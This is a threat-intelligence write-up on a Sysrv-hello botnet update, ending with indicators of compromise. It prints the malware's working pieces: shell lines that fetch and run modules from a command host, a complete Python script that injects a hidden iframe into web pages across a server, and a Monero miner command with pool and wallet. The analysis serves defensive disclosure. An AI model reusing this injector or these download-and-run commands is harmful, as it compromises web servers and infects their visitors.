From the end of last year to now, we have see the uptick of the mining botnet families. While new families have been popping up, some old ones are get frequently updated. Our BotMon system has recently reported about the [rinfo][z0miner]. And the latest case comes from Sysrv-hello. Two security companies have recently analyzed the new variant of the family , but we noticed sysrv's author pushed a new update on April 20, adding a new infection method, injecting malicious script into the html page and infecting users when they visit the compromised webpage.
New modules of a.py and BrowserUpdate.exe
We know that sysrv can infect both Linux and Windows systems, and its entry is a script file, a bash script under Linux, the most common file name is ldr.sh, and a PowerShell script ldr.ps1 under Windows. We noticed this new update only targets the Linux ldr.sh, which adds the following code:
curl $cc/BrowserUpdate.exe > /tmp/BrowserUpdate.exe curl $cc/a.py > /tmp/a.py python /tmp/a.py & nohup python /tmp/a.py 1>/dev/null 2>&1 &
You can see that 2 new modules were added: a.py and BrowserUpdate.exe, where a.py will be executed directly by ldr.sh.
The a.py file is a Python program, with only 20 lines of code.
import os d = "<iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>" for _dir in ["/var", "/usr/local", "/home", "/opt"]: for root, dirs, files in os.walk(_dir): for i in files: path = os.path.join(root, i) if os.path.splitext(path) not in [".html", ".php", ".htm", ".jsp", ".asp", ".tpl"]: continue try: with open(path) as f: data = f.read() if (d in data) or ("<head>" not in data): continue with open(path, "w") as f: f.write(data.replace("<head>", "<head>"+d))#+'<script async="async" src="//bmst.pw/6034003x100.js"></script>')) except: continue dst = os.path.join(root, "BrowserUpdate.exe") os.system("cp -rf /tmp/BrowserUpdate.exe '%s'" % dst) os.system("rm -rf /tmp/BrowserUpdate.exe")
The function of this code is to go through the directories of
"/var", "/usr/local", "/home" and
"/opt" on the infected machine, looking for web files with
".html", ".php", ".htm", ".jsp", ".asp" or
".tpl" suffixes, and inserting an iframe code into them once found.
<head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>
So, if someone visits the modified web page, the BrowserUpdate.exe will be downloaded, here let’s take a look at this exe file.
BrowserUpdate.exe is a PE32 program packed with UPX. VT scan results show that it is a malicious program of CoinMiner. The exe will release two 64-bit PE files:
CreateFileW("C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\ModuleInstaller.exe", 0x40000000, 0x0, NULL, 0x2, 0x80, 0x0) CreateFileW("C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\WinRing0x64.sys", 0x40000000, 0x0, NULL, 0x2, 0x80, 0x0)
Then BrowserUpdate.exe will call the two files using the following command.
cmd /c \"%TEMP%\\ModuleInstaller.exe\" --coin monero --donate-level 0 -o xmr-eu2.nanopool.org:14444 -u 41wSatLj9j4ZnwkBj2bEL59TdW7Fp8mmcUpKPyuB5XeBZNMxHND2MpK75w4q4mLtNmhQGVUnTdhh4XTffKFQ1Xz3Qk4hYoo
The above command will start mining activity with the assigned pool and wallet. Actually the released exe and sys belong to a set of xmrig suite, with ModuleInstaller.exe as the main program which loads WinRing0x64.sys driver. There have been reports about them by other vendors.
Through the above analysis, it is easy to see that this update of Sysrv-hello is mainly to improve the propagation ability, besides making the compromised linux machine a mining host, by injecting malicious code into the webservers’ html pages, it could potentially infect visiting users on Windows platform.
Considering that sysrv has been going through several updates, we expect that there might be more actions coming. We will keep an eye on it.
Readers are always welcomed to reach us on twitter, or email to netlab[at]360.cn.
833822feda97936d690ff6b983ad1a87 ldr.sh 645647171d92e1fe289b63bbd2f2db86 a.py 048aa5b804cde0768111c633e0faa028 BrowserUpdate.exe a7013a2c7fd3a6168a7c0d9eed825c32 MODULEINSTALLER.EXE 0c0195c48b6b8582fa6f6373032118da WINRING0X64.SYS
http://184.108.40.206/ldr.sh http://220.127.116.11/a.py http://18.104.22.168/BrowserUpdate.exe http://22.214.171.124/sys.i686
miner pool and wallet
pool: xmr-eu2.nanopool.org:14444 wallet：41wSatLj9j4ZnwkBj2bEL59TdW7Fp8mmcUpKPyuB5XeBZNMxHND2MpK75w4q4mLtNmhQGVUnTdhh4XTffKFQ1Xz3Qk4hYoo